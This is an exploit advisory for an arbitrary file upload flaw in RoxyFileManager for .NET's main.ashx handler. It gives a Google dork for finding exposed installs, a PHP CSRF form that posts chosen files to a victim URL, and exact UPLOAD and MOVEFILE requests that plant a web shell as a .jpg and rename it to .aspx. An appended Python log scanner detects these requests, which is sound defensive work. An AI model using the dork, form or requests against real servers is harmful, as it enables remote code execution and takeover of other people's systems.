- # Exploit Title: RoxyFileManager For .NET (main.ashx) - Arbitrary File Upload
- # Google Dork: inurl:/fileman/Uploads
- # Date: 05-06-2019
- # Exploit Author: AkatsuChan - Security Ghost
- # Author Homepage: http://www.akatsuchan.zone.id
- # Vendor Homepage: http://www.roxyfileman.com
- # Software Link: http://www.roxyfileman.com/download
- # Version: 1.4.4 or older (may work in 1.4.5)
- # Tested on: Windows 7
- description:
- The vulnerability is in the main.ashx file: an attacker can upload files using CSRF and can also issue commands to view, rename, and move files or directories.
- CSRF :
- <?php
- // Step 1: form that asks for the target URL and the multipart field name.
- echo '
- <center>
- <form method="post">
- <select name="array" required>
- <option value="files[]">files []</option>
- </select>
- <input type="text" name="target" size="50" placeholder="url http://site.com/bug/vuln.php" style="width: 260px; margin: 5px auto; padding-left: 5px;" required><br>
- <input type="submit" name="kunci" value=" Kunci Sasaran!">
- </form></center>';
- // Read the submitted values; they are empty on the first page load.
- $url = $_POST['target'] ?? '';
- $pf = $_POST['array'] ?? '';
- $terkuncyihh = $_POST['kunci'] ?? '';
- // Step 2: once a target is submitted, render a multipart form that posts to it from this page.
- if($terkuncyihh) {
- echo "<center><form method='post'
- target='_blank' action='$url'
- enctype='multipart/form-data'>
- <div class='fileUpload btn btn-primary'>Pilih File<input class='upload' type='file' name='$pf'></div>
- <input class='fileUpload btn btn-primary ' type='submit' name='g' value=' Upload Cok!'></form></center>";
- }
- ?>
- poc :
- First, add the command " ?a=UPLOAD&d=/[path]/fileman/Uploads " to main.ashx
- (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )
- Second, copy that URL into the CSRF form, click "kunci", select your shell and click "upload".
- ( recommended to use the .jpg extension first, then follow the next step to change it back to the .aspx / .asp extension )
- If shell.jpg is uploaded successfully, go back to main.ashx and add this command :
- " ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
- (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
- then shell.jpg will change to shell.aspx [ this doesn't always work ]
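Both requests in the PoC leave a recognisable trace in the web server log. The following is an added detection example, not part of the original paste: it scans IIS W3C log lines for `a=UPLOAD` requests whose Referer is not the site itself and for `a=MOVEFILE` requests that change a file to a server-executed extension. The log lines, the host `site.example`, the IP addresses and the extension list are constructed assumptions.

```python
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlparse

# Extensions ASP.NET/IIS executes by default (assumption: extend for your handler mappings).
EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".cshtml"}

# Constructed IIS W3C log lines; hosts and IPs are documentation placeholders.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Referer) sc-status
2019-06-05 10:00:01 POST /konichiwa/fileman/asp_net/main.ashx a=UPLOAD&d=/konichiwa/fileman/Uploads 198.51.100.7 http://site.example/konichiwa/fileman/index.html 200
2019-06-05 10:02:13 POST /konichiwa/fileman/asp_net/main.ashx a=UPLOAD&d=/konichiwa/fileman/Uploads 203.0.113.9 http://other.example/form.php 200
2019-06-05 10:02:40 POST /konichiwa/fileman/asp_net/main.ashx a=MOVEFILE&f=/konichiwa/fileman/Uploads/a.jpg&n=/konichiwa/fileman/Uploads/img/a.jpg 198.51.100.7 http://site.example/konichiwa/fileman/index.html 200
2019-06-05 10:03:02 GET /konichiwa/fileman/asp_net/main.ashx a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx 203.0.113.9 - 200
"""

def parse_w3c(lines):
    """Yield one dict per request, taking column names from the #Fields: directive."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def findings(lines, site_host):
    """Return (rule, client_ip, path) tuples for suspicious main.ashx requests."""
    out = []
    for r in parse_w3c(lines):
        if not r.get("cs-uri-stem", "").lower().endswith("/main.ashx"):
            continue
        q = {k.lower(): v[0] for k, v in parse_qs(r.get("cs-uri-query", "")).items()}
        action = q.get("a", "").upper()
        referer_host = urlparse(r.get("cs(Referer)", "-")).hostname  # None when absent
        if action == "UPLOAD" and referer_host != site_host:
            # Upload whose form was not served by this site: the CSRF pattern.
            out.append(("cross-site-upload", r.get("c-ip"), q.get("d", "")))
        elif action == "MOVEFILE":
            src = PurePosixPath(q.get("f", "")).suffix.lower()
            dst = PurePosixPath(q.get("n", "")).suffix.lower()
            if dst in EXECUTABLE and dst != src:
                # File moved from a passive type to a server-executed one.
                out.append(("move-to-executable", r.get("c-ip"), q.get("n", "")))
    return out

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG.splitlines(), "site.example"):
        print(hit)
```

Uploads with no Referer at all are also reported by the first rule, so expect some noise from clients that strip the header.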